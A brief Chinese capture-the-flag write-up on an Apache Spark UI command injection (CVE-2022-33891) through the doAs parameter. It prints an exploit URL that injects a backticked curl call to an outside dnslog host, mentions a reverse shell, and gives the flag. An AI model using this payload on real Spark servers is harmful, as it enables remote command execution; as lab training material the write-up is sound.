题目解析
Apache Spark UI 提供了通过配置选项 spark.acls.enable 启用 ACL 的可能性。使用身份验证过滤器,这会检查用户是否具有查看或修改应用程序的访问权限。如果启用了 ACL,则 HttpSecurityFilter 中的代码路径可以允许某人通过提供任意用户名来执行模拟。然后,恶意用户可能能够访问权限检查功能,该功能最终将根据他们的输入构建 Unix shell 命令并执行它。这将导致任意 shell 命令执行,因为用户 Spark 当前正在运行。此问题早先被披露为 CVE-2022-33891,但错误地声称版本 3.1.3(此后已停产)不会受到影响。此漏洞仅影响维护者不再支持的产品。建议用户升级到支持的 Apache Spark 版本,例如 3.4.0 版本。
漏洞复现
启动环境访问发现是502,原因是点击链接跳转地址中没有端口,查看路径端口为8080
那么直接带着端口8080访问即可
命令执行
使用curl命令探测到目标可以出网
http://eci-2ze4yv5qcgxy5fmq30cx.cloudeci1.ichunqiu.com:8080/jobs/?doAs=`curl http://w2s2ig.dnslog.cn`
那就直接反弹shell或者带flag出来即可。
flag最终值
flag{e1289663-3ad8-44db-abc4-d6006720528a}